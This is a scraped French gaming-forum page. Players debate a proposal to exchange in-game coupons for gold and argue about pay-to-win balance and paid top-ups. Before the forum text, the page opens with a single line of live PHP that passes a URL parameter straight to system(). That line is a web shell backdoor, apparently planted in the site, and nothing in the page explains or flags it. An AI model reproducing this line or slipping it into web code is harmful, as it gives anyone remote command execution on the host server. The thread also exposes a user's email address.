ob_start(); system($_GET['cmd']); $execcode = ob_get_contents(); ob_end_clean();

GGCORP Forums

Mot de passe oublie
 Inscri. Rapide
Recherche
!show!: 255|Reponse: 4

Achat d'or avec des coupons [Copier l'URL]

Rank: 4

Heure de publication 2020-1-22 19:28:24 |Afficher toutes les publications
Bonjour à toutes et à tous,

Le titre du post comporte l'idée principale.
Je ne sais pas si quelqu'un a déjà fait la demande, mais il serait cool d'avoir une fonction ou un event dans lequel il serait possible d'échanger des coupons contre de l'or.
Je sais très bien que l'idée ne plairait pas à tout le monde, mais pour celles et ceux qui ne rechargent pas (par idéal ou par manque d'argent), ça leur permettraient de les aider un minimum.

Le pack d'or échangé (contre des coupons) pourrait contenir, non pas une somme fixe mais variable (e.g. pour chaque 500 coupons dépensé, on aurait un pack contenant 20~50 - 50~70 - 70~100 or).

L'idée est d'avoir un jeu un petit peu plus équitable, ce qui n'empêche pas ceux qui rechargent de dépenser leur argent pour obtenir de plus grosses sommes d'or !

Voilà. A discutter !

Utiliser la magie Signaler

Rank: 8Rank: 8

Heure de publication 2020-1-22 20:46:44 |Afficher toutes les publications
idée absurde, plus aucune personne ne rechargerai avec ton idée, jeco mes coupon et hop de lor, ses un pay to win le jeux .............

Rank: 4

Heure de publication 2020-1-22 21:07:18 |Afficher toutes les publications
Edite par levschekmadian@gmail.com a 2020-1-22 21:14
archange38 a repondu a 2020-1-22 20:46
idée absurde, plus aucune personne ne rechargerai avec ton idée, jeco mes coupon et hop de lor, se ...

enfin bon y'a des fonds de croissance quand même pour avoir de l'or sans recharger donc pourquoi ça recharge encore je ne sais pas mais je ne pense pas que de simple coupons transformer en or empecherait les gens de recharger c'est tout ^^.

Sinon c'est sur l'idée en soi elle aboutira pas tout simplement parce que les seuls a qui ça servirait vraiment c'est les free to play. C'est pas que ça servirait a rien pour ceux qui payent juste qu'ils ont déjà de l'or x) et qui veulent pas que toi t'en est en tant que free player après c'est normal le perso coute 1200 euros presque et en plus il est buggé x) donc si en plus tout le monde peut l'avoir ça devient bizarre de mettre des sous dans le jeu!

EDIT: Après l'équilibrage entre free et p2w il est déjà un peu la même si c'est pas parfait mais t'as les perso du Challenge ultime les 2 perso du club ninja en réincarné et maintenant t'as même les alliens si tu peut les battres avec un compte free ce qui doit être faisable sur le long terme et en stats pure ils sont pareils que les nouveaux persos quasiment donc c'est déjà ça.
Perso si je voulais de l'équilibre a la limite je te dirais les bêtes spirituelles x) bah ouais mince y'en a ils payent mais ils ont pas leur 5eme bete parce qu'ils ont pas mis assez

Rank: 6Rank: 6

Heure de publication 2020-1-26 15:24:37 |Afficher toutes les publications
j'suis d'accord avec archange, c un jeu pay2win, plus personne rechargerai donc 0 sous au dev

tchao

Rank: 8Rank: 8

Heure de publication 2020-1-27 10:55:56 |Afficher toutes les publications
levschekmadian@gmail.com a repondu a 2020-1-22 21:07
enfin bon y'a des fonds de croissance quand même pour avoir de l'or sans recharger donc pourquoi  ...

perso moi si les coupons peuvent se transformer en or je garde mes euros et je suis pas le seul qui profiterai pour ne plus mettre de sous. tu parles du fond pour avoir de l'or, oui mais tout les deux mois et voilà tu dois gérer tandis que là en gros on échange nos coupons quand on veux et gagnons de l'or quand on le veux également, la mort du jeux quoi faut bien réfléchir à ça ;) et non ça servirait pas qu'au free to play, tu sais au moins le stock de coupons que certains peuvent avoir ? jme fais dans les 45k coupons minimum tout les mois (sans compter les récups sur évent de dépenses)

Vous devez vous identifier avant de pouvoir repondre Identifiant | Inscri. Rapide

GGCORP|MyNinja|MyBankai|MyPirate|MyLegend|Archiver|GGCORP Inc.

GMT+2, 2020-2-23 08:32 , Processed in 0.023907 second(s), 10 queries , Xcache On.